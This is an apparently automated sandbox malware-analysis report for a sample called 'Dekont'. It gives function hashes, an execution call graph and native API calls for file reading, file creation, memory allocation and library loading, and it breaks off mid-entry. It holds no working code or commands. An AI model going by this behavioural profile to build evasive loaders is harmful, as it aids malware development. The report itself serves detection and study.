                                  • Opcode Fuzzy Hash: 93d5c1875a51ed04caf4400a811502397d5f6e178e764dcd969756cd83686d31
                                  • Instruction Fuzzy Hash: F3012B720043449AE7119E26DDC4B66BF98DF43370F18C55AED1A4A28AD2399D40CAB1
                                  Function 00C3D744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066116357.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c3d000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63c836d634ee4ae86cbc99272a1baf9b7a63dba08108bc2f8747c2c881f21692
                                  • Instruction ID: a47a950c8e6106cdc504f7e685fa52447e25b04e2dbd47113d851efb08e77f51
                                  • Opcode Fuzzy Hash: 63c836d634ee4ae86cbc99272a1baf9b7a63dba08108bc2f8747c2c881f21692
                                  • Instruction Fuzzy Hash: ECF0C2724043449AE7108E15D988B62FF98EB52334F18C05AED094A28AC2799C40CAB1

                                  Non-executed Functions

                                  Function 0271D5BC Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2066657375.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2710000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecaf5c1dfee661666b1eec6c1ec1981280a323a399a31cc4fa817aaccc45657f
                                  • Instruction ID: 324137d09a5ed9af22ae530ac0b35cf97b23bd86fd688a595dff7e6f51d78a14
                                  • Opcode Fuzzy Hash: ecaf5c1dfee661666b1eec6c1ec1981280a323a399a31cc4fa817aaccc45657f
                                  • Instruction Fuzzy Hash: 6EA15B36E007198FCF06DFB8C88459EB7B2FF85304B25856AE805AB265DB31E955CF81

                                  Execution Graph

                                  Execution Coverage:1.4%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:552
                                  Total number of Limit Nodes:68
                                  execution_graph 95287 41f180 95288 41f18b 95287->95288 95290 41b940 95287->95290 95291 41b966 95290->95291 95298 409d40 95291->95298 95293 41b972 95294 41b993 95293->95294 95306 40c1c0 95293->95306 95294->95288 95296 41b985 95342 41a680 95296->95342 95345 409c90 95298->95345 95300 409d54 95300->95293 95301 409d4d 95301->95300 95357 409c30 95301->95357 95307 40c1e5 95306->95307 95770 40b1c0 95307->95770 95309 40c23c 95774 40ae40 95309->95774 95311 40c4b3 95311->95296 95312 40c262 95312->95311 95783 4143a0 95312->95783 95314 40c2a7 95314->95311 95786 408a60 95314->95786 95316 40c2eb 95316->95311 95794 41a4d0 95316->95794 95320 40c341 95321 40c348 95320->95321 95806 419fe0 95320->95806 95323 41bd90 2 API calls 95321->95323 95325 40c355 95323->95325 95325->95296 95326 40c392 95327 41bd90 2 API calls 95326->95327 95328 40c399 95327->95328 95328->95296 95329 40c3a2 95330 40f4a0 3 API calls 95329->95330 95331 40c416 95330->95331 95331->95321 95332 40c421 95331->95332 95333 41bd90 2 API calls 95332->95333 95334 40c445 95333->95334 95811 41a030 95334->95811 95337 419fe0 2 API calls 95338 40c480 95337->95338 95338->95311 95816 419df0 95338->95816 95341 41a680 2 API calls 95341->95311 95343 41af30 LdrLoadDll 95342->95343 95344 41a69f ExitProcess 95343->95344 95344->95294 95376 418b90 95345->95376 95349 409cb6 95349->95301 95350 409cac 95350->95349 95383 41b280 95350->95383 95352 409cf3 95352->95349 95394 409ab0 95352->95394 95354 409d13 95400 409620 LdrLoadDll 95354->95400 95356 409d25 95356->95301 95358 409c4a 95357->95358 95359 41b570 LdrLoadDll 95357->95359 95745 41b570 95358->95745 95359->95358 95362 41b570 LdrLoadDll 95363 409c71 95362->95363 95364 40f180 95363->95364 95365 40f199 95364->95365 95753 40b040 95365->95753 95367 40f1ac 95757 41a1b0 95367->95757 95370 409d65 95370->95293 95372 40f1d2 95373 40f1fd 95372->95373 95763 41a230 95372->95763 95374 41a460 2 API calls 95373->95374 95374->95370 95377 418b9f 95376->95377 95401 414e50 95377->95401 95379 409ca3 95380 418a40 95379->95380 95407 41a5d0 95380->95407 95384 41b299 95383->95384 95414 414a50 95384->95414 95386 41b2b1 95387 41b2ba 95386->95387 95453 41b0c0 95386->95453 95387->95352 95389 41b2ce 95389->95387 95471 419ed0 95389->95471 95397 409aca 95394->95397 95723 407ea0 95394->95723 95396 409ad1 95396->95354 95397->95396 95736 408160 95397->95736 95400->95356 95402 414e6a 95401->95402 95405 414e5e 95401->95405 95402->95379 95404 414fbc 95404->95379 95405->95402 95406 4152d0 LdrLoadDll 95405->95406 95406->95404 95410 41af30 95407->95410 95409 418a55 95409->95350 95411 41af40 95410->95411 95412 41af62 95410->95412 95413 414e50 LdrLoadDll 95411->95413 95412->95409 95413->95412 95415 414d85 95414->95415 95417 414a64 95414->95417 95415->95386 95417->95415 95479 419c20 95417->95479 95418 414b44 95419 414b90 95418->95419 95420 414b73 95418->95420 95423 414b7d 95418->95423 95484 41a330 95419->95484 95541 41a430 LdrLoadDll 95420->95541 95423->95386 95424 414bb7 95425 41bd90 2 API calls 95424->95425 95426 414bc3 95425->95426 95426->95423 95427 414d49 95426->95427 95428 414d5f 95426->95428 95433 414c52 95426->95433 95429 41a460 2 API calls 95427->95429 95550 414790 LdrLoadDll NtReadFile NtClose 95428->95550 95430 414d50 95429->95430 95430->95386 95432 414d72 95432->95386 95434 414cb9 95433->95434 95436 414c61 95433->95436 95434->95427 95435 414ccc 95434->95435 95543 41a2b0 95435->95543 95438 414c66 95436->95438 95439 414c7a 95436->95439 95542 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 95438->95542 95442 414c97 95439->95442 95443 414c7f 95439->95443 95442->95430 95499 414410 95442->95499 95487 4146f0 95443->95487 95445 414c70 95445->95386 95447 414d2c 95547 41a460 95447->95547 95448 414c8d 95448->95386 95451 414caf 95451->95386 95452 414d38 95452->95386 95454 41b0d1 95453->95454 95455 41b0e3 95454->95455 95568 41bd10 95454->95568 95455->95389 95457 41b104 95571 414070 95457->95571 95459 41b150 95459->95389 95460 41b127 95460->95459 95461 414070 3 API calls 95460->95461 95463 41b149 95461->95463 95463->95459 95596 415390 95463->95596 95464 41b1da 95465 41b1ea 95464->95465 95690 41aed0 LdrLoadDll 95464->95690 95606 41ad40 95465->95606 95468 41b218 95685 419e90 95468->95685 95472 41af30 LdrLoadDll 95471->95472 95473 419eec 95472->95473 95717 1012c0a 95473->95717 95474 419f07 95476 41bd90 95474->95476 95720 41a640 95476->95720 95478 41b329 95478->95352 95480 419c3c 95479->95480 95481 41af30 LdrLoadDll 95479->95481 95480->95418 95482 41af30 LdrLoadDll 95480->95482 95481->95480 95483 419c7c 95482->95483 95483->95418 95485 41af30 LdrLoadDll 95484->95485 95486 41a34c NtCreateFile 95485->95486 95486->95424 95488 41470c 95487->95488 95489 41a2b0 LdrLoadDll 95488->95489 95490 41472d 95489->95490 95491 414734 95490->95491 95492 414748 95490->95492 95493 41a460 2 API calls 95491->95493 95494 41a460 2 API calls 95492->95494 95495 41473d 95493->95495 95496 414751 95494->95496 95495->95448 95551 41bfa0 LdrLoadDll RtlAllocateHeap 95496->95551 95498 41475c 95498->95448 95500 41445b 95499->95500 95502 41448e 95499->95502 95503 41a2b0 LdrLoadDll 95500->95503 95501 4145d9 95504 41a2b0 LdrLoadDll 95501->95504 95502->95501 95507 4144aa 95502->95507 95505 414476 95503->95505 95511 4145f4 95504->95511 95506 41a460 2 API calls 95505->95506 95508 41447f 95506->95508 95509 41a2b0 LdrLoadDll 95507->95509 95508->95451 95510 4144c5 95509->95510 95513 4144e1 95510->95513 95514 4144cc 95510->95514 95564 41a2f0 LdrLoadDll 95511->95564 95517 4144e6 95513->95517 95518 4144fc 95513->95518 95516 41a460 2 API calls 95514->95516 95515 41462e 95519 41a460 2 API calls 95515->95519 95520 4144d5 95516->95520 95521 41a460 2 API calls 95517->95521 95526 414501 95518->95526 95552 41bf60 95518->95552 95522 414639 95519->95522 95520->95451 95523 4144ef 95521->95523 95522->95451 95523->95451 95534 414513 95526->95534 95555 41a3e0 95526->95555 95527 414567 95528 41457e 95527->95528 95563 41a270 LdrLoadDll 95527->95563 95529 414585 95528->95529 95530 41459a 95528->95530 95532 41a460 2 API calls 95529->95532 95533 41a460 2 API calls 95530->95533 95532->95534 95535 4145a3 95533->95535 95534->95451 95536 4145cf 95535->95536 95558 41bb60 95535->95558 95536->95451 95538 4145ba 95539 41bd90 2 API calls 95538->95539 95540 4145c3 95539->95540 95540->95451 95541->95423 95542->95445 95544 41af30 LdrLoadDll 95543->95544 95545 414d14 95544->95545 95546 41a2f0 LdrLoadDll 95545->95546 95546->95447 95548 41af30 LdrLoadDll 95547->95548 95549 41a47c NtClose 95548->95549 95549->95452 95550->95432 95551->95498 95565 41a600 95552->95565 95554 41bf78 95554->95526 95556 41a3fc NtReadFile 95555->95556 95557 41af30 LdrLoadDll 95555->95557 95556->95527 95557->95556 95559 41bb84 95558->95559 95560 41bb6d 95558->95560 95559->95538 95560->95559 95561 41bf60 2 API calls 95560->95561 95562 41bb9b 95561->95562 95562->95538 95563->95528 95564->95515 95566 41af30 LdrLoadDll 95565->95566 95567 41a61c RtlAllocateHeap 95566->95567 95567->95554 95691 41a510 95568->95691 95570 41bd3d 95570->95457 95572 414081 95571->95572 95574 414089 95571->95574 95572->95460 95573 41435c 95573->95460 95574->95573 95694 41cf00 95574->95694 95576 4140dd 95577 41cf00 2 API calls 95576->95577 95580 4140e8 95577->95580 95578 414136 95581 41cf00 2 API calls 95578->95581 95580->95578 95699 41cfa0 95580->95699 95582 41414a 95581->95582 95583 41cf00 2 API calls 95582->95583 95585 4141bd 95583->95585 95584 41cf00 2 API calls 95592 414205 95584->95592 95585->95584 95587 414334 95706 41cf60 LdrLoadDll RtlFreeHeap 95587->95706 95589 41433e 95707 41cf60 LdrLoadDll RtlFreeHeap 95589->95707 95591 414348 95708 41cf60 LdrLoadDll RtlFreeHeap 95591->95708 95705 41cf60 LdrLoadDll RtlFreeHeap 95592->95705 95594 414352 95709 41cf60 LdrLoadDll RtlFreeHeap 95594->95709 95597 4153a1 95596->95597 95598 414a50 8 API calls 95597->95598 95599 4153b7 95598->95599 95600 4153f2 95599->95600 95601 415405 95599->95601 95605 41540a 95599->95605 95602 41bd90 2 API calls 95600->95602 95603 41bd90 2 API calls 95601->95603 95604 4153f7 95602->95604 95603->95605 95604->95464 95605->95464 95710 41ac00 95606->95710 95609 41ac00 LdrLoadDll 95610 41ad5d 95609->95610 95611 41ac00 LdrLoadDll 95610->95611 95612 41ad66 95611->95612 95613 41ac00 LdrLoadDll 95612->95613 95614 41ad6f 95613->95614 95615 41ac00 LdrLoadDll 95614->95615 95616 41ad78 95615->95616 95617 41ac00 LdrLoadDll 95616->95617 95618 41ad81 95617->95618 95619 41ac00 LdrLoadDll 95618->95619 95620 41ad8d 95619->95620 95621 41ac00 LdrLoadDll 95620->95621 95622 41ad96 95621->95622 95623 41ac00 LdrLoadDll 95622->95623 95624 41ad9f 95623->95624 95625 41ac00 LdrLoadDll 95624->95625 95626 41ada8 95625->95626 95627 41ac00 LdrLoadDll 95626->95627 95628 41adb1 95627->95628 95629 41ac00 LdrLoadDll 95628->95629 95630 41adba 95629->95630 95631 41ac00 LdrLoadDll 95630->95631 95632 41adc6 95631->95632 95633 41ac00 LdrLoadDll 95632->95633 95634 41adcf 95633->95634 95635 41ac00 LdrLoadDll 95634->95635 95636 41add8 95635->95636 95637 41ac00 LdrLoadDll 95636->95637 95638 41ade1 95637->95638 95639 41ac00 LdrLoadDll 95638->95639 95640 41adea 95639->95640 95641 41ac00 LdrLoadDll 95640->95641 95642 41adf3 95641->95642 95643 41ac00 LdrLoadDll 95642->95643 95644 41adff 95643->95644 95645 41ac00 LdrLoadDll 95644->95645 95646 41ae08 95645->95646 95647 41ac00 LdrLoadDll 95646->95647 95648 41ae11 95647->95648 95649 41ac00 LdrLoadDll 95648->95649 95650 41ae1a 95649->95650 95651 41ac00 LdrLoadDll 95650->95651 95652 41ae23 95651->95652 95653 41ac00 LdrLoadDll 95652->95653 95654 41ae2c 95653->95654 95655 41ac00 LdrLoadDll 95654->95655 95656 41ae38 95655->95656 95657 41ac00 LdrLoadDll 95656->95657 95658 41ae41 95657->95658 95659 41ac00 LdrLoadDll 95658->95659 95660 41ae4a 95659->95660 95661 41ac00 LdrLoadDll 95660->95661 95662 41ae53 95661->95662 95663 41ac00 LdrLoadDll 95662->95663 95664 41ae5c 95663->95664 95665 41ac00 LdrLoadDll 95664->95665 95666 41ae65 95665->95666 95667 41ac00 LdrLoadDll 95666->95667 95668 41ae71 95667->95668 95669 41ac00 LdrLoadDll 95668->95669 95670 41ae7a 95669->95670 95671 41ac00 LdrLoadDll 95670->95671 95672 41ae83 95671->95672 95673 41ac00 LdrLoadDll 95672->95673 95674 41ae8c 95673->95674 95675 41ac00 LdrLoadDll 95674->95675 95676 41ae95 95675->95676 95677 41ac00 LdrLoadDll 95676->95677 95678 41ae9e 95677->95678 95679 41ac00 LdrLoadDll 95678->95679 95680 41aeaa 95679->95680 95681 41ac00 LdrLoadDll 95680->95681 95682 41aeb3 95681->95682 95683 41ac00 LdrLoadDll 95682->95683 95684 41aebc 95683->95684 95684->95468 95686 41af30 LdrLoadDll 95685->95686 95687 419eac 95686->95687 95716 1012df0 LdrInitializeThunk 95687->95716 95688 419ec3 95688->95389 95690->95465 95692 41a52c NtAllocateVirtualMemory 95691->95692 95693 41af30 LdrLoadDll 95691->95693 95692->95570 95693->95692 95695 41cf10 95694->95695 95696 41cf16 95694->95696 95695->95576 95697 41bf60 2 API calls 95696->95697 95698 41cf3c 95697->95698 95698->95576 95700 41cfc5 95699->95700 95702 41cffd 95699->95702 95701 41bf60 2 API calls 95700->95701 95703 41cfda 95701->95703 95702->95580 95704 41bd90 2 API calls 95703->95704 95704->95702 95705->95587 95706->95589 95707->95591 95708->95594 95709->95573 95711 41ac1b 95710->95711 95712 414e50 LdrLoadDll 95711->95712 95713 41ac3b 95712->95713 95714 414e50 LdrLoadDll 95713->95714 95715 41ace7 95713->95715 95714->95715 95715->95609 95716->95688 95718 1012c11 95717->95718 95719 1012c1f LdrInitializeThunk 95717->95719 95718->95474 95719->95474 95721 41a65c RtlFreeHeap 95720->95721 95722 41af30 LdrLoadDll 95720->95722 95721->95478 95722->95721 95724 407eb0 95723->95724 95725 407eab 95723->95725 95726 41bd10 2 API calls 95724->95726 95725->95397 95729 407ed5 95726->95729 95727 407f38 95727->95397 95728 419e90 2 API calls 95728->95729 95729->95727 95729->95728 95730 407f3e 95729->95730 95734 41bd10 2 API calls 95729->95734 95739 41a590 95729->95739 95732 407f64 95730->95732 95733 41a590 2 API calls 95730->95733 95732->95397 95735 407f55 95733->95735 95734->95729 95735->95397 95737 40817e 95736->95737 95738 41a590 2 API calls 95736->95738 95737->95354 95738->95737 95740 41a5ac 95739->95740 95741 41af30 LdrLoadDll 95739->95741 95744 1012c70 LdrInitializeThunk 95740->95744 95741->95740 95742 41a5c3 95742->95729 95744->95742 95746 41b593 95745->95746 95749 40acf0 95746->95749 95750 40ad14 95749->95750 95751 40ad50 LdrLoadDll 95750->95751 95752 409c5b 95750->95752 95751->95752 95752->95362 95754 40b063 95753->95754 95756 40b0e0 95754->95756 95768 419c60 LdrLoadDll 95754->95768 95756->95367 95758 41af30 LdrLoadDll 95757->95758 95759 40f1bb 95758->95759 95759->95370 95760 41a7a0 95759->95760 95761 41af30 LdrLoadDll 95760->95761 95762 41a7bf LookupPrivilegeValueW 95761->95762 95762->95372 95764 41a24c 95763->95764 95765 41af30 LdrLoadDll 95763->95765 95769 1012ea0 LdrInitializeThunk 95764->95769 95765->95764 95766 41a26b 95766->95373 95768->95756 95769->95766 95771 40b1f0 95770->95771 95772 40b040 LdrLoadDll 95771->95772 95773 40b204 95772->95773 95773->95309 95775 40ae51 95774->95775 95776 40ae4d 95774->95776 95777 40ae6a 95775->95777 95778 40ae9c 95775->95778 95776->95312 95821 419ca0 LdrLoadDll 95777->95821 95822 419ca0 LdrLoadDll 95778->95822 95780 40aead 95780->95312 95782 40ae8c 95782->95312 95784 40f4a0 3 API calls 95783->95784 95785 4143c6 95784->95785 95785->95314 95787 408a67 95786->95787 95823 4087a0 95787->95823 95790 4087a0 19 API calls 95791 408a8a 95790->95791 95793 408a9d 95791->95793 95841 40f710 10 API calls 95791->95841 95793->95316 95795 41af30 LdrLoadDll 95794->95795 95796 41a4ec 95795->95796 95960 1012e80 LdrInitializeThunk 95796->95960 95797 40c322 95799 40f4a0 95797->95799 95800 40f4bd 95799->95800 95961 419f90 95800->95961 95803 40f505 95803->95320 95804 419fe0 2 API calls 95805 40f52e 95804->95805 95805->95320 95807 419ffc 95806->95807 95808 41af30 LdrLoadDll 95806->95808 95967 1012d10 LdrInitializeThunk 95807->95967 95808->95807 95809 40c385 95809->95326 95809->95329 95812 41af30 LdrLoadDll 95811->95812 95813 41a04c 95812->95813 95968 1012d30 LdrInitializeThunk 95813->95968 95814 40c459 95814->95337 95817 41af30 LdrLoadDll 95816->95817 95818 419e0c 95817->95818 95969 1012fb0 LdrInitializeThunk 95818->95969 95819 40c4ac 95819->95341 95821->95782 95822->95780 95824 407ea0 4 API calls 95823->95824 95831 4087ba 95824->95831 95825 408a49 95825->95790 95825->95793 95826 408a3f 95827 408160 2 API calls 95826->95827 95827->95825 95830 419ed0 2 API calls 95830->95831 95831->95825 95831->95826 95831->95830 95835 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95831->95835 95838 419df0 2 API calls 95831->95838 95839 41a460 LdrLoadDll NtClose 95831->95839 95842 419ce0 95831->95842 95845 4085d0 95831->95845 95857 40f5f0 LdrLoadDll NtClose 95831->95857 95858 419d60 LdrLoadDll 95831->95858 95859 419d90 LdrLoadDll 95831->95859 95860 419e20 LdrLoadDll 95831->95860 95861 4083a0 95831->95861 95877 405f60 LdrLoadDll 95831->95877 95835->95831 95838->95831 95839->95831 95841->95793 95843 41af30 LdrLoadDll 95842->95843 95844 419cfc 95843->95844 95844->95831 95846 4085e6 95845->95846 95878 419850 95846->95878 95848 4085ff 95853 408771 95848->95853 95899 4081a0 95848->95899 95850 4086e5 95851 4083a0 11 API calls 95850->95851 95850->95853 95852 408713 95851->95852 95852->95853 95854 419ed0 2 API calls 95852->95854 95853->95831 95855 408748 95854->95855 95855->95853 95856 41a4d0 2 API calls 95855->95856 95856->95853 95857->95831 95858->95831 95859->95831 95860->95831 95862 4083c9 95861->95862 95939 408310 95862->95939 95865 41a4d0 2 API calls 95866 4083dc 95865->95866 95866->95865 95867 408467 95866->95867 95870 408462 95866->95870 95947 40f670 95866->95947 95867->95831 95868 41a460 2 API calls 95869 40849a 95868->95869 95869->95867 95871 419ce0 LdrLoadDll 95869->95871 95870->95868 95872 4084ff 95871->95872 95872->95867 95951 419d20 95872->95951 95874 408563 95874->95867 95875 414a50 8 API calls 95874->95875 95876 4085b8 95875->95876 95876->95831 95877->95831 95879 41bf60 2 API calls 95878->95879 95880 419867 95879->95880 95906 409310 95880->95906 95882 419882 95883 4198c0 95882->95883 95884 4198a9 95882->95884 95887 41bd10 2 API calls 95883->95887 95885 41bd90 2 API calls 95884->95885 95886 4198b6 95885->95886 95886->95848 95888 4198fa 95887->95888 95889 41bd10 2 API calls 95888->95889 95890 419913 95889->95890 95896 419bb4 95890->95896 95912 41bd50 95890->95912 95893 419ba0 95894 41bd90 2 API calls 95893->95894 95895 419baa 95894->95895 95895->95848 95897 41bd90 2 API calls 95896->95897 95898 419c09 95897->95898 95898->95848 95900 40829f 95899->95900 95901 4081b5 95899->95901 95900->95850 95901->95900 95902 414a50 8 API calls 95901->95902 95903 408222 95902->95903 95904 41bd90 2 API calls 95903->95904 95905 408249 95903->95905 95904->95905 95905->95850 95907 409335 95906->95907 95908 40acf0 LdrLoadDll 95907->95908 95909 409368 95908->95909 95911 40938d 95909->95911 95915 40cf20 95909->95915 95911->95882 95933 41a550 95912->95933 95916 40cf4c 95915->95916 95917 41a1b0 LdrLoadDll 95916->95917 95918 40cf65 95917->95918 95919 40cf6c 95918->95919 95926 41a1f0 95918->95926 95919->95911 95923 40cfa7 95924 41a460 2 API calls 95923->95924 95925 40cfca 95924->95925 95925->95911 95927 41a20c 95926->95927 95928 41af30 LdrLoadDll 95926->95928 95932 1012ca0 LdrInitializeThunk 95927->95932 95928->95927 95929 40cf8f 95929->95919 95931 41a7e0 LdrLoadDll 95929->95931 95931->95923 95932->95929 95934 41af30 LdrLoadDll 95933->95934 95935 41a56c 95934->95935 95938 1012f90 LdrInitializeThunk 95935->95938 95936 419b99 95936->95893 95936->95896 95938->95936 95940 408328 95939->95940 95941 408343 95940->95941 95942 40acf0 LdrLoadDll 95940->95942 95943 414e50 LdrLoadDll 95941->95943 95942->95941 95944 408353 95943->95944 95945 40835c PostThreadMessageW 95944->95945 95946 408370 95944->95946 95945->95946 95946->95866 95948 40f683 95947->95948 95954 419e60 95948->95954 95952 419d3c 95951->95952 95953 41af30 LdrLoadDll 95951->95953 95952->95874 95953->95952 95955 41af30 LdrLoadDll 95954->95955 95956 419e7c 95955->95956 95959 1012dd0 LdrInitializeThunk 95956->95959 95957 40f6ae 95957->95866 95959->95957 95960->95797 95962 419fac 95961->95962 95963 41af30 LdrLoadDll 95961->95963 95966 1012f30 LdrInitializeThunk 95962->95966 95963->95962 95964 40f4fe 95964->95803 95964->95804 95966->95964 95967->95809 95968->95814 95969->95819 95970 1012ad0 LdrInitializeThunk

                                  Executed Functions

                                  Function 0041A3DB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                  • Instruction ID: 40098347e2ccfe5138c34a84cead36b309c134ff29b5ac5e9c21c1f122b9f0a0
                                  • Opcode Fuzzy Hash: 7aaaa16702adae6d23ede2d680456887a62317e53decf251faaf94379e42fb99
                                  • Instruction Fuzzy Hash: BD0129B2211104ABCB14DF99CC85EEB77A9EF8C364F158649FA1D97251C630E912CBA1
                                  Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 41a3e0-41a3f6 9 41a3fc-41a429 NtReadFile 8->9 10 41a3f7 call 41af30 8->10 10->9
                                  APIs
                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                  Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 263 40acf0-40ad0c 264 40ad14-40ad19 263->264 265 40ad0f call 41cc20 263->265 266 40ad1b-40ad1e 264->266 267 40ad1f-40ad2d call 41d040 264->267 265->264 270 40ad3d-40ad4e call 41b470 267->270 271 40ad2f-40ad3a call 41d2c0 267->271 276 40ad50-40ad64 LdrLoadDll 270->276 277 40ad67-40ad6a 270->277 271->270 276->277
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                                  Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 278 41a330-41a381 call 41af30 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                                  Function 0041A50F Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 281 41a50f-41a54d call 41af30 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                  • Instruction ID: b6d20d9d9baca4ad67b6d83bb7e3b47810d24a1c747aa2bf8ffe25eb9f604490
                                  • Opcode Fuzzy Hash: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                  • Instruction Fuzzy Hash: 99F01CB5211108AFCB14DF99CC81EEB77A9AF88354F15824DFE0997241C630E811CBA0
                                  Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 284 41a510-41a526 285 41a52c-41a54d NtAllocateVirtualMemory 284->285 286 41a527 call 41af30 284->286 286->285
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
